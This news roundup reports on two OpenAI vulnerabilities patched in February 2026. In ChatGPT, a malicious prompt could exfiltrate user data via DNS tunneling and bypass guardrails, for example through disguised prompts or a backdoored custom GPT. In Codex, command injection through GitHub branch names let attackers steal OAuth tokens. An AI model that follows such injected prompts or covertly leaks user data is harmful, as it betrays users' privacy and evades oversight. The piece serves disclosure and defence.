OpenAI patches critical ChatGPT and Codex security vulnerabilities exposing user data and tokens

Reviewed byNidhi Govil

6 Sources

Share

OpenAI addressed two critical security vulnerabilities in February 2026. Check Point discovered a ChatGPT flaw enabling silent data exfiltration through DNS tunneling, bypassing AI guardrails without user consent. BeyondTrust found a command injection vulnerability in Codex allowing GitHub token theft through malicious branch names, potentially compromising enterprise organizations.

ChatGPT Security Vulnerability Enables Silent Data Exfiltration

OpenAI patched a critical security vulnerability in ChatGPT on February 20, 2026, following responsible disclosure by Check Point Research. The flaw allowed attackers to exfiltrate sensitive user data without triggering any warnings or requiring user consent, creating what cybersecurity experts described as a dangerous blind spot in AI systems

1

.

Source: CXOToday

Source: CXOToday

The vulnerability exploited a hidden DNS-based communication path within the Linux runtime used by ChatGPT for code execution and data analysis, effectively bypassing the platform's built-in AI guardrails designed to prevent unauthorized data sharing

2

.

The attack method relied on DNS tunneling, a technique that encodes information into domain queries rather than using conventional HTTP or API channels. Since DNS resolution remained available as part of normal system operation, ChatGPT did not recognize this activity as risky behavior requiring user approval

2

. Check Point researchers demonstrated that a single malicious prompt could transform ordinary conversations into covert exfiltration channels, leaking user messages, uploaded files, and other sensitive user data without detection

1

.

Source: Hacker News

Source: Hacker News

Prompt Injection Attacks Threaten Privacy

The vulnerability becomes particularly concerning when considering how users interact with ChatGPT in enterprise organizations and personal contexts. With OpenAI serving more than 800 million users weekly as of late 2025, and users sending approximately 18 billion messages weekly by July 2025, the potential impact extends far beyond casual chatbot interactions

5

. People regularly upload highly sensitive information including medical reports, financial spreadsheets, contracts, and confidential business documents, assuming their data remains secure within the platform.

Attackers could initiate prompt injection attacks by disguising malicious prompts as productivity hacks or premium feature unlocks, convincing users to paste specially crafted instructions

1

. The threat escalates significantly with custom GPTs, where malicious logic could be embedded directly into the application rather than requiring user interaction. For instance, a backdoored GPT posing as a personal medical advisor could silently exfiltrate lab results and patient information to attacker-controlled servers

2

.

What makes this vulnerability particularly insidious is that attackers don't necessarily need complete documents. ChatGPT's analytical capabilities mean the AI can extract and summarize the most critical insights from lengthy files, potentially leaking condensed versions containing only the most valuable information

5

. This represents not just document theft, but theft of processed intelligence.

Command Injection Vulnerability Compromises OpenAI Codex

In parallel with the ChatGPT disclosure, BeyondTrust's Phantom Labs revealed a separate command injection vulnerability affecting OpenAI Codex, the cloud-based software engineering agent integrated into ChatGPT

3

. The flaw stemmed from improper input validation when processing GitHub branch names during task creation, allowing attackers to inject arbitrary shell commands into the container environment

4

.

Source: SiliconANGLE

Source: SiliconANGLE

Researchers demonstrated they could steal GitHub OAuth authentication tokens used by Codex to authenticate with repositories, potentially enabling lateral movement within GitHub environments

3

. The vulnerability affected Codex's web interface, command-line interface, SDK, and integrated development environment integrations, creating multiple attack vectors

1

.

More alarmingly, attackers could scale exploitation by embedding malicious payloads directly into GitHub branch names, potentially compromising multiple developers working on shared repositories

4

. This attack surface expansion poses significant risks to developer workflows in enterprise organizations where Codex may have broad permissions across multiple projects.

OpenAI Implements Comprehensive Security Fixes

OpenAI addressed both vulnerabilities through coordinated patches deployed on February 20, 2026. For the Codex flaw, the company implemented improved input validation, stronger shell escaping protections, and tighter controls around token exposure within container environments

4

. Additional measures limited token scope and lifetime during task execution to minimize potential damage from future exploits.

Crucially, there is no evidence that either vulnerability was exploited maliciously in the wild before disclosure

1

. However, cybersecurity experts emphasize these incidents reveal a fundamental truth about AI security. "This research reinforces a hard truth for the AI era: don't assume AI tools are secure by default," said Eli Smadja, head of research at Check Point Research

1

.

The discoveries highlight how AI platforms have evolved into full computing environments handling sensitive data, yet native security controls prove insufficient on their own. Organizations deploying AI systems must implement independent visibility and layered protection rather than relying solely on vendor safeguards

1

. As AI agents become more deeply integrated into enterprise workflows, security teams must treat the containers they operate in and the input they consume with the same rigor applied to traditional application security boundaries

4

.

Today's Top Stories

TheOutpost.ai

Your Daily Dose of Curated AI News

Don’t drown in AI news. We cut through the noise - filtering, ranking and summarizing the most important AI news, breakthroughs and research daily. Spend less time searching for the latest in AI and get straight to action.

© 2026 Triveous Technologies Private Limited
Instagram logo
LinkedIn logo